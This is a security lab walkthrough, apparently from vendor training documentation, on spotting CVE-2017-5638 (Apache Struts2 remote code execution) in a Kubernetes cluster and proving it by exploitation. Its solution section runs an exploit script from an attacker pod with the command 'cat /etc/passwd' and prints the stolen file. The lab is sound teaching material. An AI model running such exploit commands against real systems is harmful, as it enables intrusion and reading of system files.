Scenario: Runtime Vulnerability Scanning¶
Prerequisites¶
- Playground One EKS EC2 Cluster
- Vision One Container Security
- Playground One Scenarios
Ensure to have the EKS EC2 Cluster including the Scenarios up and running:
Disclaimer¶
Note: It is highly recommended to have the
awsone.access_ipset to a single IP or at least a small CIDR before deploying the EKS cluster. This will prevent anonymous users playing with your environmnent. Remember: we're using vulnerable apps.
Overview¶
This scenario showcases the vulnerability detection functionalities of Vision One Container Security at runtime. The deployments of the scenarios configuration are all based on container images with plenty of different vulnerabilities.
By the end of the scenario, you will understand and learn the following:
- Reviewing vulnerability findings and searching for a specific vulnerability
- Proof the finding by exploitation
The story¶
Every now and then new critical vulnerabilities are disclosed. A famous one with huge impact was the vulnerability CVE-2017-5638.
On March 6th 2017, a new remote code execution (RCE) vulnerability in Apache Struts 2 was made public. This vulnerability allows a remote attacker to inject operating system commands into a web application through the “Content-Type” header. Written in Java, Apache Struts 2 is the popular open source web application framework. This is yet another incident that adds up to a long list of vulnerabilities in this framework.
You want to search and validate for this specific vulnerability in your production environment.
Goals¶
The goal of this scenario is to identify the vulnerable deployment and proof that it is vulnerable.
Hints¶
Click here
✨ Didn't find the vulnerable deployment?Head over to Container Security --> Runtime vulnerability and search for CVE-2017-5638. 🙌
Solution & Walkthrough¶
Click here
Head over to Attack Surface Risk Managemet and search for the vulnerability CVE-2017-5638 Identify the vulnerable deployment/container Find out the namespace and metadata. You'll see that the deployment is running within the `victims` namespace and owns the label `app=java-goof`. Checking the services in the namespace `victims` tells usNAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
java-goof-service NodePort 172.20.132.99 <none> 8080:30119/TCP 26m
web-app-service NodePort 172.20.121.120 <none> 80:32194/TCP 26m
namespace="victims"
kubectl exec -n attackers \
$(kubectl -n attackers get pods --selector=app=attacker-cve-2017-5638 -o jsonpath='{.items[0].metadata.name}') -- \
python3 exploit.py http://java-goof-service.${namespace}:8080 'cat /etc/passwd'
[*] CVE: 2017-5638 - Apache Struts2 S2-045
[*] cmd: cat /etc/passwd
b'root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n_apt:x:100:65534::/nonexistent:/usr/sbin/nologin\n'